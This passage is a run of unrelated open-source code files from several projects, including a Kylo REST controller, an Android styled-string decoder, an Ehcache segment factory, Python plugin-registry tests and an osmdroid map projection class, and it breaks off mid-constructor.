JsonWriter.WriteObject<T> typedWriter() { return (writer, value) -> { if (value == null) { writer.writeNull(); return; } writer.writeByte(OBJECT_START); writer.writeString(value.getClass().getSimpleName()); writer.writeByte(SEMI); writer.serializeObject(value); writer.writeByte(OBJECT_END); }; } } }
1,264
1,016
<reponame>peter-ls/kylo package com.thinkbiganalytics.jobrepo.rest.controller; /*- * #%L * thinkbig-job-repository-controller * %% * Copyright (C) 2017 ThinkBig Analytics * %% * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #L% */ import com.thinkbiganalytics.jobrepo.security.OperationsAccessControl; import com.thinkbiganalytics.metadata.api.MetadataAccess; import com.thinkbiganalytics.metadata.api.jobrepo.nifi.NifiFeedProcessorStatisticsProvider; import com.thinkbiganalytics.metadata.api.jobrepo.nifi.NifiFeedProcessorStats; import com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStatsTransform; import com.thinkbiganalytics.rest.model.LabelValue; import com.thinkbiganalytics.security.AccessController; import org.joda.time.DateTime; import org.springframework.beans.factory.annotation.Autowired; import java.util.Arrays; import java.util.List; import java.util.stream.Collectors; import javax.inject.Inject; import javax.ws.rs.DefaultValue; import javax.ws.rs.GET; import javax.ws.rs.Path; import javax.ws.rs.PathParam; import javax.ws.rs.Produces; import javax.ws.rs.core.MediaType; import javax.ws.rs.core.Response; import io.swagger.annotations.Api; import io.swagger.annotations.ApiOperation; import io.swagger.annotations.ApiResponse; import io.swagger.annotations.ApiResponses; @Api(tags = "Operations Manager - Feeds", produces = "application/json") @Path("/v1/provenance-stats") public class NifiFeedProcessorStatisticsRestController { @Inject private MetadataAccess metadataAccess; @Inject private AccessController accessController; @Autowired private NifiFeedProcessorStatisticsProvider statsProvider; @GET @Path("/all") @Produces(MediaType.APPLICATION_JSON) @ApiOperation("Gets the provenance statistics for all feeds.") @ApiResponses( @ApiResponse(code = 200, message = "Returns the provenance stats.", response = com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats.class, responseContainer = "List") ) public Response findStats() { this.accessController.checkPermission(AccessController.SERVICES, OperationsAccessControl.ACCESS_OPS); return metadataAccess.read(() -> { List<? 
extends NifiFeedProcessorStats> list = statsProvider.findWithinTimeWindow(DateTime.now().minusDays(1), DateTime.now()); List<com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats> model = NifiFeedProcessorStatsTransform.toModel(list); return Response.ok(model).build(); }); } @GET @Path("/{feedName}/processor-duration/{timeframe}") @Produces(MediaType.APPLICATION_JSON) @ApiOperation("Gets the job duration for the specified feed.") @ApiResponses( @ApiResponse(code = 200, message = "Returns the job duration.", response = com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats.class, responseContainer = "List") ) public Response findStats(@PathParam("feedName") String feedName, @PathParam("timeframe") @DefaultValue("THREE_MIN") NifiFeedProcessorStatisticsProvider.TimeFrame timeframe) { this.accessController.checkPermission(AccessController.SERVICES, OperationsAccessControl.ACCESS_OPS); return metadataAccess.read(() -> { List<? extends NifiFeedProcessorStats> list = statsProvider.findFeedProcessorStatisticsByProcessorName(feedName, timeframe); List<com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats> model = NifiFeedProcessorStatsTransform.toModel(list); return Response.ok(model).build(); }); } @GET @Path("/{feedName}/{timeframe}") @Produces(MediaType.APPLICATION_JSON) @ApiOperation("Gets the statistics for the specified feed.") @ApiResponses( @ApiResponse(code = 200, message = "Returns the feed statistics.", response = com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats.class, responseContainer = "List") ) public Response findFeedStats(@PathParam("feedName") String feedName, @PathParam("timeframe") @DefaultValue("THREE_MIN") NifiFeedProcessorStatisticsProvider.TimeFrame timeframe) { this.accessController.checkPermission(AccessController.SERVICES, OperationsAccessControl.ACCESS_OPS); return metadataAccess.read(() -> { List<? extends NifiFeedProcessorStats> list = statsProvider.findForFeedStatisticsGroupedByTime(feedName, timeframe); List<com.thinkbiganalytics.metadata.rest.jobrepo.nifi.NifiFeedProcessorStats> model = NifiFeedProcessorStatsTransform.toModel(list); return Response.ok(model).build(); }); } @GET @Path("/time-frame-options") @Produces(MediaType.APPLICATION_JSON) @ApiOperation("Gets the default time frame options.") @ApiResponses( @ApiResponse(code = 200, message = "Returns the time frame options.", response = LabelValue.class, responseContainer = "List") ) public Response getTimeFrameOptions() { List<LabelValue> vals = Arrays.stream(NifiFeedProcessorStatisticsProvider.TimeFrame.values()) .map(timeFrame -> new LabelValue(timeFrame.getDisplayName(), timeFrame.name())) .collect(Collectors.toList()); return Response.ok(vals).build(); } }
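/*
 * Editor's note: a hedged client-side sketch showing how the
 * "/v1/provenance-stats/{feedName}/{timeframe}" endpoint above could be called with a
 * plain JAX-RS client. The base URL and feed name are placeholder assumptions, and any
 * authentication the deployment requires is omitted; only the path layout and the
 * THREE_MIN timeframe value come from the resource class above.
 */
package com.thinkbiganalytics.jobrepo.rest.controller;

import javax.ws.rs.client.Client;
import javax.ws.rs.client.ClientBuilder;
import javax.ws.rs.core.MediaType;

final class ProvenanceStatsClientSketch {

    public static void main(String[] args) {
        Client client = ClientBuilder.newClient();
        try {
            // GET /v1/provenance-stats/{feedName}/{timeframe} -> JSON list of NifiFeedProcessorStats
            String json = client
                    .target("http://localhost:8400/proxy")                   // placeholder base URL
                    .path("v1/provenance-stats/my.sample.feed/THREE_MIN")    // placeholder feed name
                    .request(MediaType.APPLICATION_JSON)
                    .get(String.class);
            System.out.println(json);
        } finally {
            client.close();
        }
    }
}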
2,004
831
/* * Copyright (C) 2018 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.android.tools.idea.resources.aar; import com.android.aapt.Resources; import com.android.utils.XmlUtils; import java.util.ArrayList; import java.util.List; import org.jetbrains.annotations.NotNull; /** * Static methods for converting {@link Resources.StyledString} proto message back to the original XML string. */ class ProtoStyledStringDecoder { /** * Decodes the given {@link Resources.StyledString} proto message to obtain the original XML string. * * @param styledStringMsg the proto message to decode * @return the original XML string */ @NotNull public static String getRawXmlValue(@NotNull Resources.StyledString styledStringMsg) { String text = styledStringMsg.getValue(); StringBuilder xmlValue = new StringBuilder(text.length() * 2); List<Resources.StyledString.Span> spanList = styledStringMsg.getSpanList(); List<Resources.StyledString.Span> spanStack = new ArrayList<>(spanList.size()); int offset = 0; for (int i = 0; i <= styledStringMsg.getSpanCount(); i++) { int oldOffset = offset; Resources.StyledString.Span spanMsg; if (i < styledStringMsg.getSpanCount()) { spanMsg = styledStringMsg.getSpan(i); offset = spanMsg.getFirstChar(); } else { spanMsg = null; offset = text.length(); } // Check if there are any tags that need to be closed. while (!spanStack.isEmpty() && spanStack.get(spanStack.size() - 1).getLastChar() < offset) { Resources.StyledString.Span span = spanStack.remove(spanStack.size() - 1); int spanEnd = span.getLastChar() + 1; if (spanEnd > oldOffset) { XmlUtils.appendXmlTextValue(xmlValue, text, oldOffset, spanEnd); oldOffset = spanEnd; } String tagText = span.getTag(); int tagEnd = indexOfOrEnd(tagText, ';', 0); // Write the closing tag. xmlValue.append("</").append(tagText, 0, tagEnd).append('>'); } if (offset >= oldOffset) { // Copy text between tags. XmlUtils.appendXmlTextValue(xmlValue, text, oldOffset, offset); // Start a new tag. if (spanMsg != null) { String tagText = spanMsg.getTag(); int pos = indexOfOrEnd(tagText, ';', 0); if (pos != 0) { spanStack.add(spanMsg); xmlValue.append('<').append(tagText, 0, pos); while (pos < tagText.length()) { pos++; int nextPos = indexOfOrEnd(tagText, ';', pos); int nameEnd = tagText.indexOf('=', pos); if (nameEnd > pos && nameEnd < nextPos) { xmlValue.append(' '); xmlValue.append(tagText, pos, nameEnd + 1); xmlValue.append('"'); // Attribute values in the proto message are not escaped. Append with escaping. XmlUtils.appendXmlAttributeValue(xmlValue, tagText, nameEnd + 1, nextPos); xmlValue.append('"'); } pos = nextPos; } xmlValue.append('>'); } } } } return xmlValue.toString(); } private static int indexOfOrEnd(@NotNull String str, char ch, int fromIndex) { int index = str.indexOf(ch, fromIndex); return index >= 0 ? index : str.length(); } /** Do not instantiate. All methods are static. */ private ProtoStyledStringDecoder() {} }
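/*
 * Editor's note: an illustrative sketch for the decoder above, assuming the generated
 * aapt proto bindings (com.android.aapt.Resources) are on the classpath. The span marks
 * characters 6..9 of the value ("bold", last index inclusive) with a "b" tag, so the
 * decoder is expected to print: Hello <b>bold</b> world
 */
package com.android.tools.idea.resources.aar;

import com.android.aapt.Resources;

final class ProtoStyledStringDecoderSketch {

    public static void main(String[] args) {
        Resources.StyledString styled = Resources.StyledString.newBuilder()
                .setValue("Hello bold world")
                .addSpan(Resources.StyledString.Span.newBuilder()
                        .setTag("b")
                        .setFirstChar(6)  // first styled character (inclusive)
                        .setLastChar(9))  // last styled character (inclusive)
                .build();

        // Re-creates the original raw XML form of the styled string.
        System.out.println(ProtoStyledStringDecoder.getRawXmlValue(styled));
    }
}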
1,580
5,411
<reponame>thorium-cfx/fivem /* * GMAC * (C) 2016 <NAME>, <NAME> * (C) 2017 <NAME> * * Botan is released under the Simplified BSD License (see license.txt) */ #ifndef BOTAN_GMAC_H_ #define BOTAN_GMAC_H_ #include <botan/mac.h> BOTAN_FUTURE_INTERNAL_HEADER(gmac.h) namespace Botan { class BlockCipher; class GHASH; /** * GMAC * * GMAC requires a unique initialization vector be used for each message. * This must be provided via the MessageAuthenticationCode::start() API */ class BOTAN_PUBLIC_API(2,0) GMAC final : public MessageAuthenticationCode { public: void clear() override; std::string name() const override; size_t output_length() const override; MessageAuthenticationCode* clone() const override; Key_Length_Specification key_spec() const override; /** * Creates a new GMAC instance. * * @param cipher the underlying block cipher to use */ explicit GMAC(BlockCipher* cipher); GMAC(const GMAC&) = delete; GMAC& operator=(const GMAC&) = delete; ~GMAC(); private: void add_data(const uint8_t[], size_t) override; void final_result(uint8_t[]) override; void start_msg(const uint8_t nonce[], size_t nonce_len) override; void key_schedule(const uint8_t key[], size_t size) override; static const size_t GCM_BS = 16; std::unique_ptr<BlockCipher> m_cipher; std::unique_ptr<GHASH> m_ghash; secure_vector<uint8_t> m_aad_buf; size_t m_aad_buf_pos; bool m_initialized; }; } #endif
635
317
############################################################################## # # include makefile for nmake under Windows NT # ############################################################################## # # $Id$ # # # If NWCHEM_TOP_WIN32 is set, take it. Otherwise, if NWCHEM_TOP is set, # use that. One of the two must be set, however. # !IFNDEF NWCHEM_TOP_WIN32 !IFDEF NWCHEM_TOP NWCHEM_TOP_WIN32 = $(NWCHEM_TOP) !ELSE !MESSAGE You must define NWCHEM_TOP in your environment to be the path !MESSAGE of the top level nwchem directory in DOS format ... e.g. !MESSAGE NWCHEM_TOP="D:\PNNL\nwchem" !MESSAGE !ERROR NWCHEM_TOP not set. !ENDIF !ENDIF TOPDIR = $(NWCHEM_TOP_WIN32) SRCDIR = $(TOPDIR)\src # Set LIB_DIR externally to override library dir name under $(TOPDIR)\lib !IFDEF LIB_DIR LIBDIR = $(TOPDIR)\lib\$(LIB_DIR) !ELSE LIBDIR = $(TOPDIR)\lib\win32 !ENDIF # !!! This is called LIB_DISTRIB in prev NT makefiles LIB_DISTRIB = $(LIBDIR) BINDIR = $(TOPDIR)\bin\win32 INCDIR = $(TOPDIR)\src\include CNFDIR = $(TOPDIR)\src\config OBJDIR = .\obj GLOB_DEFINES =-DWIN32 -DUSE_FCD DEFINES = $(GLOB_DEFINES) $(LIB_DEFINES) GLOB_INCLUDES= -I"$(SRCDIR)\include" -I"$(SRCDIR)\tools\include" INCLUDES = $(GLOB_INCLUDES) $(LIB_INCLUDES) #AR = link.exe -lib -nologo AR = lib -nologo ARFLAGS = /out:$(LIBRARY_PATH) CC = cl -nologo FC = f90 -nologo !IFDEF NWDEBUG COPT = -Z7 FOPT = /debug:full /nooptimize !ELSE COPT = FOPT = /fast /optimize:5 /noinline /nofltconsistency # Added /noinline since it breaks LAPACK dlamach routines !ENDIF CFLAGS = -W3 $(COPT) $(INCLUDES) $(DEFINES) -Fo"$(OBJDIR)/" -c FFLAGS = $(FOPT) $(INCLUDES) $(DEFINES) /automatic /check:none /traceback /fpscomp=nogeneral /warn:argument_checking /warn:nofileopt /warn:nouncalled /object:"$(OBJDIR)/" /fpp:"/c /m" /nodefine /nokeep -c .SUFFIXES: .SUFFIXES: .obj .s .F .c .c{$(OBJDIR)}.obj: $(CC) $(CFLAGS) $< .F{$(OBJDIR)}.obj: $(FC) $(FFLAGS) $<
816
711
package com.java110.dto.feeManualCollectionDetail;

import com.java110.dto.PageDto;

import java.io.Serializable;
import java.util.Date;

/**
 * @ClassName FeeManualCollectionDetailDto
 * @Description Data-layer wrapper for manual fee collection details
 * @Author wuxw
 * @Date 2019/4/24 8:52
 * @Version 1.0
 * add by wuxw 2019/4/24
 **/
public class FeeManualCollectionDetailDto extends PageDto implements Serializable {

    // 1010 collection in progress, 2020 paid, 3030 voided
    public static final String STATE_COLLECTION = "1010";
    public static final String STATE_PAY_FEE = "2020";
    public static final String STATE_DELETE = "3030";

    private String amount;
    private String feeName;
    private String detailId;
    private String startTime;
    private String endTime;
    private String state;
    private String stateName;
    private String communityId;
    private String collectionId;
    private String feeId;
    private String configId;

    private Date createTime;

    private String statusCd = "0";

    public String getAmount() {
        return amount;
    }

    public void setAmount(String amount) {
        this.amount = amount;
    }

    public String getFeeName() {
        return feeName;
    }

    public void setFeeName(String feeName) {
        this.feeName = feeName;
    }

    public String getDetailId() {
        return detailId;
    }

    public void setDetailId(String detailId) {
        this.detailId = detailId;
    }

    public String getStartTime() {
        return startTime;
    }

    public void setStartTime(String startTime) {
        this.startTime = startTime;
    }

    public String getEndTime() {
        return endTime;
    }

    public void setEndTime(String endTime) {
        this.endTime = endTime;
    }

    public String getState() {
        return state;
    }

    public void setState(String state) {
        this.state = state;
    }

    public String getCommunityId() {
        return communityId;
    }

    public void setCommunityId(String communityId) {
        this.communityId = communityId;
    }

    public String getCollectionId() {
        return collectionId;
    }

    public void setCollectionId(String collectionId) {
        this.collectionId = collectionId;
    }

    public String getFeeId() {
        return feeId;
    }

    public void setFeeId(String feeId) {
        this.feeId = feeId;
    }

    public Date getCreateTime() {
        return createTime;
    }

    public void setCreateTime(Date createTime) {
        this.createTime = createTime;
    }

    public String getStatusCd() {
        return statusCd;
    }

    public void setStatusCd(String statusCd) {
        this.statusCd = statusCd;
    }

    public String getStateName() {
        return stateName;
    }

    public void setStateName(String stateName) {
        this.stateName = stateName;
    }

    public String getConfigId() {
        return configId;
    }

    public void setConfigId(String configId) {
        this.configId = configId;
    }
}
1,191
474
<reponame>sidia-dev-team/GearVRf /* * Copyright 2016 Samsung Electronics Co., LTD * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.gearvrf.wearconstants; import android.os.Build.VERSION; import android.os.Build.VERSION_CODES; import android.view.MotionEvent; import java.io.Serializable; import java.nio.ByteBuffer; public class TouchEvent implements Serializable { public static final int BYTE_BUFFER_SIZE = 28; int action; long downTime; long eventTime; float x; float y; public TouchEvent(int action, long downTime, long eventTime, float x, float y) { this.action = action; this.downTime = downTime; this.eventTime = eventTime; this.x = x; this.y = y; } public TouchEvent(byte[] bytes) { ByteBuffer buffer = ByteBuffer.wrap(bytes); action = buffer.getInt(); downTime = buffer.getLong(); eventTime = buffer.getLong(); x = buffer.getFloat(); y = buffer.getFloat(); } public byte[] toBytes() { ByteBuffer buffer = ByteBuffer.allocate(BYTE_BUFFER_SIZE); buffer.putInt(action); buffer.putLong(downTime); buffer.putLong(eventTime); buffer.putFloat(x); buffer.putFloat(y); return buffer.array(); } public long getDownTime() { return downTime; } public long getEventTime() { return eventTime; } public int getAction() { return action; } public float getX() { return x; } public float getY() { return y; } public String toString() { StringBuilder builder = new StringBuilder(30); if (VERSION.SDK_INT >= VERSION_CODES.KITKAT) { builder.append(MotionEvent.actionToString(action)); } else { builder.append(action); } builder.append(", X=").append(String.format("%.2f", x)).append(", Y=").append(String .format("%.2f", y)); return builder.toString(); } }
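/*
 * Editor's note: a minimal round-trip sketch for the fixed 28-byte TouchEvent wire
 * format above (int action + long downTime + long eventTime + float x + float y).
 * The action value 0 stands for MotionEvent.ACTION_DOWN and is written as a plain int,
 * and TouchEvent#toString() (which uses MotionEvent) is not called, so no Android device
 * APIs are exercised. All sample values are arbitrary.
 */
package org.gearvrf.wearconstants;

final class TouchEventRoundTripSketch {

    public static void main(String[] args) {
        TouchEvent original = new TouchEvent(0 /* ACTION_DOWN */, 1_000L, 1_016L, 12.5f, 34.75f);

        // Serialize into the 28-byte layout and decode it back.
        byte[] wire = original.toBytes();
        TouchEvent decoded = new TouchEvent(wire);

        if (decoded.getAction() != original.getAction()
                || decoded.getDownTime() != original.getDownTime()
                || decoded.getEventTime() != original.getEventTime()
                || decoded.getX() != original.getX()
                || decoded.getY() != original.getY()) {
            throw new AssertionError("TouchEvent byte round trip failed");
        }
        System.out.println("Round-tripped " + wire.length + " bytes successfully");
    }
}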
998
14,668
// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CHROME_BROWSER_MEDIA_WEBRTC_DESKTOP_MEDIA_LIST_OBSERVER_H_ #define CHROME_BROWSER_MEDIA_WEBRTC_DESKTOP_MEDIA_LIST_OBSERVER_H_ class DesktopMediaList; // Interface implemented by the desktop media picker dialog to receive // notifications about changes in DesktopMediaList. class DesktopMediaListObserver { public: virtual void OnSourceAdded(int index) = 0; virtual void OnSourceRemoved(int index) = 0; virtual void OnSourceMoved(int old_index, int new_index) = 0; virtual void OnSourceNameChanged(int index) = 0; virtual void OnSourceThumbnailChanged(int index) = 0; virtual void OnSourcePreviewChanged(size_t index) = 0; protected: virtual ~DesktopMediaListObserver() {} }; #endif // CHROME_BROWSER_MEDIA_WEBRTC_DESKTOP_MEDIA_LIST_OBSERVER_H_
301
676
<filename>app/src/main/java/com/alorma/github/injector/module/NotificationsModule.java<gh_stars>100-1000 package com.alorma.github.injector.module; import android.content.Context; import com.alorma.github.injector.scope.NotificationsScope; import com.alorma.github.notifications.AlarmManagerJobManager; import com.alorma.github.notifications.AppJobManager; import com.alorma.github.notifications.AppNotificationsManager; import com.alorma.github.notifications.AppNotificationsManagerImpl; import dagger.Module; import dagger.Provides; import javax.inject.Named; @Module public class NotificationsModule { @Provides @NotificationsScope @Named("AlarmManagerNotificationsJobManager") AppJobManager getJobManager(Context context) { return new AlarmManagerJobManager(context); } @Provides @NotificationsScope AppNotificationsManager getNotificationsManager(Context context, @Named("AlarmManagerNotificationsJobManager") AppJobManager jobManager) { return new AppNotificationsManagerImpl(context, jobManager); } }
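/*
 * Editor's note: a hypothetical wiring sketch for the Dagger module above, added for
 * illustration only. The ContextModule and NotificationsComponent names are assumptions
 * (the real project wires Context elsewhere); only NotificationsModule, NotificationsScope
 * and AppNotificationsManager come from the code above.
 */
package com.alorma.github.injector.module;

import android.content.Context;
import com.alorma.github.injector.scope.NotificationsScope;
import com.alorma.github.notifications.AppNotificationsManager;
import dagger.Component;
import dagger.Module;
import dagger.Provides;

@Module
class ContextModule {
  private final Context context;

  ContextModule(Context context) {
    this.context = context;
  }

  // Supplies the Context parameter required by the providers in NotificationsModule.
  @Provides Context provideContext() {
    return context;
  }
}

@NotificationsScope
@Component(modules = { ContextModule.class, NotificationsModule.class })
interface NotificationsComponent {
  // Scoped entry point built from the bindings declared in NotificationsModule above.
  AppNotificationsManager appNotificationsManager();

  // Typical bootstrap (builder generated by Dagger at compile time):
  // NotificationsComponent component = DaggerNotificationsComponent.builder()
  //     .contextModule(new ContextModule(appContext))
  //     .build();
}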
313
464
<reponame>sailxjx/DI-engine import pytest from ding.worker import EpisodeSerialCollector from ding.envs import BaseEnvManager, SyncSubprocessEnvManager, AsyncSubprocessEnvManager from ding.policy import DQNPolicy from ding.model import DQN from dizoo.classic_control.cartpole.envs import CartPoleEnv @pytest.mark.unittest @pytest.mark.parametrize('env_manager_type', [BaseEnvManager, SyncSubprocessEnvManager]) def test_collect(env_manager_type): env = env_manager_type([lambda: CartPoleEnv({}) for _ in range(8)], env_manager_type.default_config()) env.seed(0) model = DQN(obs_shape=4, action_shape=1) policy = DQNPolicy(DQNPolicy.default_config(), model=model).collect_mode collector = EpisodeSerialCollector(EpisodeSerialCollector.default_config(), env, policy) collected_episode = collector.collect( n_episode=18, train_iter=collector._collect_print_freq, policy_kwargs={'eps': 0.5} ) assert len(collected_episode) == 18 assert all([e[-1]['done'] for e in collected_episode]) assert all([len(c) == 0 for c in collector._traj_buffer.values()])
390
6,831
<reponame>ajayiagbebaku/NFL-Model from ..plugin_registry import PluginRegistry from typing import Callable class TypedCallableRegistry(PluginRegistry[Callable[[int], int]]): pass class GeneralCallableRegistry(PluginRegistry): _global_settings = {"global_setting": None} @property def global_setting(self): return self._global_settings["global_setting"] @global_setting.setter def global_setting(self, val): self._global_settings["global_setting"] = val def test_plugin_registry(): plugins = TypedCallableRegistry() assert plugins.names() == [] assert plugins.active == "" assert plugins.get() is None assert repr(plugins) == "TypedCallableRegistry(active='', registered=[])" plugins.register("new_plugin", lambda x: x ** 2) assert plugins.names() == ["new_plugin"] assert plugins.active == "" assert plugins.get() is None assert repr(plugins) == ( "TypedCallableRegistry(active='', " "registered=['new_plugin'])" ) plugins.enable("new_plugin") assert plugins.names() == ["new_plugin"] assert plugins.active == "new_plugin" assert plugins.get()(3) == 9 assert repr(plugins) == ( "TypedCallableRegistry(active='new_plugin', " "registered=['new_plugin'])" ) def test_plugin_registry_extra_options(): plugins = GeneralCallableRegistry() plugins.register("metadata_plugin", lambda x, p=2: x ** p) plugins.enable("metadata_plugin") assert plugins.get()(3) == 9 plugins.enable("metadata_plugin", p=3) assert plugins.active == "metadata_plugin" assert plugins.get()(3) == 27 # enabling without changing name plugins.enable(p=2) assert plugins.active == "metadata_plugin" assert plugins.get()(3) == 9 def test_plugin_registry_global_settings(): plugins = GeneralCallableRegistry() # we need some default plugin, but we won't do anything with it plugins.register("default", lambda x: x) plugins.enable("default") # default value of the global flag assert plugins.global_setting is None # enabling changes the global state, not the options plugins.enable(global_setting=True) assert plugins.global_setting is True assert plugins._options == {} # context manager changes global state temporarily with plugins.enable(global_setting="temp"): assert plugins.global_setting == "temp" assert plugins._options == {} assert plugins.global_setting is True assert plugins._options == {} def test_plugin_registry_context(): plugins = GeneralCallableRegistry() plugins.register("default", lambda x, p=2: x ** p) # At first there is no plugin enabled assert plugins.active == "" assert plugins.options == {} # Make sure the context is set and reset correctly with plugins.enable("default", p=6): assert plugins.active == "default" assert plugins.options == {"p": 6} assert plugins.active == "" assert plugins.options == {} # Make sure the context is reset even if there is an error try: with plugins.enable("default", p=6): assert plugins.active == "default" assert plugins.options == {"p": 6} raise ValueError() except ValueError: pass assert plugins.active == "" assert plugins.options == {} # Enabling without specifying name uses current name plugins.enable("default", p=2) with plugins.enable(p=6): assert plugins.active == "default" assert plugins.options == {"p": 6} assert plugins.active == "default" assert plugins.options == {"p": 2}
1,244
1,900
/* * Copyright Terracotta, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.ehcache.impl.internal.store.offheap.factories; import org.ehcache.core.spi.store.Store; import org.ehcache.impl.internal.store.offheap.SwitchableEvictionAdvisor; import org.terracotta.offheapstore.Metadata; import org.terracotta.offheapstore.ReadWriteLockedOffHeapClockCache; import org.terracotta.offheapstore.paging.PageSource; import org.terracotta.offheapstore.pinning.PinnableSegment; import org.terracotta.offheapstore.storage.StorageEngine; import org.terracotta.offheapstore.util.Factory; import java.nio.IntBuffer; import java.util.Iterator; import java.util.Set; import java.util.concurrent.locks.Lock; /** * EhcacheSegmentFactory */ public class EhcacheSegmentFactory<K, V> implements Factory<PinnableSegment<K, V>> { private final Factory<? extends StorageEngine<? super K, ? super V>> storageEngineFactory; private final PageSource tableSource; private final int tableSize; private final SwitchableEvictionAdvisor<? super K, ? super V> evictionAdvisor; private final EhcacheSegment.EvictionListener<K, V> evictionListener; public EhcacheSegmentFactory(PageSource source, Factory<? extends StorageEngine<? super K, ? super V>> storageEngineFactory, int initialTableSize, SwitchableEvictionAdvisor<? super K, ? super V> evictionAdvisor, EhcacheSegment.EvictionListener<K, V> evictionListener) { this.storageEngineFactory = storageEngineFactory; this.tableSource = source; this.tableSize = initialTableSize; this.evictionAdvisor = evictionAdvisor; this.evictionListener = evictionListener; } public PinnableSegment<K, V> newInstance() { StorageEngine<? super K, ? super V> storageEngine = storageEngineFactory.newInstance(); try { return new EhcacheSegment<>(tableSource, storageEngine, tableSize, evictionAdvisor, evictionListener); } catch (RuntimeException e) { storageEngine.destroy(); throw e; } } public static class EhcacheSegment<K, V> extends ReadWriteLockedOffHeapClockCache<K, V> { public static final int ADVISED_AGAINST_EVICTION = 1 << (Integer.SIZE - 3); private final SwitchableEvictionAdvisor<? super K, ? super V> evictionAdvisor; private final EvictionListener<K, V> evictionListener; EhcacheSegment(PageSource source, StorageEngine<? super K, ? super V> storageEngine, int tableSize, SwitchableEvictionAdvisor<? super K, ? super V> evictionAdvisor, EvictionListener<K, V> evictionListener) { super(source, true, storageEngine, tableSize); this.evictionAdvisor = evictionAdvisor; this.evictionListener = evictionListener; } @Override public V put(K key, V value) { int metadata = getEvictionAdviceStatus(key, value); return put(key, value, metadata); } private int getEvictionAdviceStatus(final K key, final V value) { return evictionAdvisor.adviseAgainstEviction(key, value) ? 
ADVISED_AGAINST_EVICTION : 0; } @Override public V putPinned(K key, V value) { int metadata = getEvictionAdviceStatus(key, value) | Metadata.PINNED; return put(key, value, metadata); } @Override protected boolean evictable(int status) { return super.evictable(status) && (((status & ADVISED_AGAINST_EVICTION) == 0) || !evictionAdvisor.isSwitchedOn()); } @Override public boolean evict(int index, boolean shrink) { Lock lock = writeLock(); lock.lock(); try { Entry<K, V> entry = getEntryAtTableOffset(index); boolean evicted = super.evict(index, shrink); if (evicted) { evictionListener.onEviction(entry.getKey(), entry.getValue()); } return evicted; } finally { lock.unlock(); } } @Override protected Set<Entry<K, V>> createEntrySet() { return new EntrySet(); } public interface EvictionListener<K, V> { void onEviction(K key, V value); } private class EntrySet extends LockedEntrySet { @Override public Iterator<Entry<K, V>> iterator() { readLock().lock(); try { return new LockedEntryIterator() { @Override protected Entry<K, V> create(IntBuffer entry) { Entry<K, V> entryObject = super.create(entry); ((Store.ValueHolder<?>) entryObject.getValue()).get(); return entryObject; } }; } finally { readLock().unlock(); } } } } }
1,772
2,291
package org.osmdroid.views; import android.graphics.Canvas; import android.graphics.Matrix; import android.graphics.Point; import android.graphics.PointF; import android.graphics.Rect; import org.osmdroid.api.IGeoPoint; import org.osmdroid.api.IProjection; import org.osmdroid.util.BoundingBox; import org.osmdroid.util.GeoPoint; import org.osmdroid.util.GeometryMath; import org.osmdroid.util.PointL; import org.osmdroid.util.RectL; import org.osmdroid.util.TileSystem; /** * A Projection serves to translate between the coordinate system of x/y on-screen pixel coordinates * and that of latitude/longitude points on the surface of the earth. You obtain a Projection from * MapView.getProjection(). You should not hold on to this object for more than one draw, since the * projection of the map could change. <br> * <br>Uses the web mercator projection * <b>Note:</b> This class will "wrap" all pixel and lat/long values that overflow their bounds * (rather than clamping to their bounds). * * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> */ public class Projection implements IProjection { /** * The size in pixels of a VERY large map, the "projected" map. * For optimization purpose, we may compute only once the projection of the GeoPoints * on this large map, and then just divide in order to get the projection on a corresponding * smaller map / smaller zoom */ public static final double mProjectedMapSize = 1L << 60; private long mOffsetX; private long mOffsetY; private long mScrollX; private long mScrollY; private final Matrix mRotateAndScaleMatrix = new Matrix(); private final Matrix mUnrotateAndScaleMatrix = new Matrix(); private final float[] mRotateScalePoints = new float[2]; private final BoundingBox mBoundingBoxProjection = new BoundingBox(); private final double mZoomLevelProjection; private final Rect mScreenRectProjection = new Rect(); private final Rect mIntrinsicScreenRectProjection; private boolean horizontalWrapEnabled; private boolean verticalWrapEnabled; private final double mMercatorMapSize; private final double mTileSize; private final float mOrientation; private final GeoPoint mCurrentCenter = new GeoPoint(0., 0); private final TileSystem mTileSystem; /** * @since 6.1.1 */ private final int mMapCenterOffsetX; private final int mMapCenterOffsetY; Projection(MapView mapView) { this( mapView.getZoomLevelDouble(), mapView.getIntrinsicScreenRect(null), mapView.getExpectedCenter(), mapView.getMapScrollX(), mapView.getMapScrollY(), mapView.getMapOrientation(), mapView.isHorizontalMapRepetitionEnabled(), mapView.isVerticalMapRepetitionEnabled(), MapView.getTileSystem(), 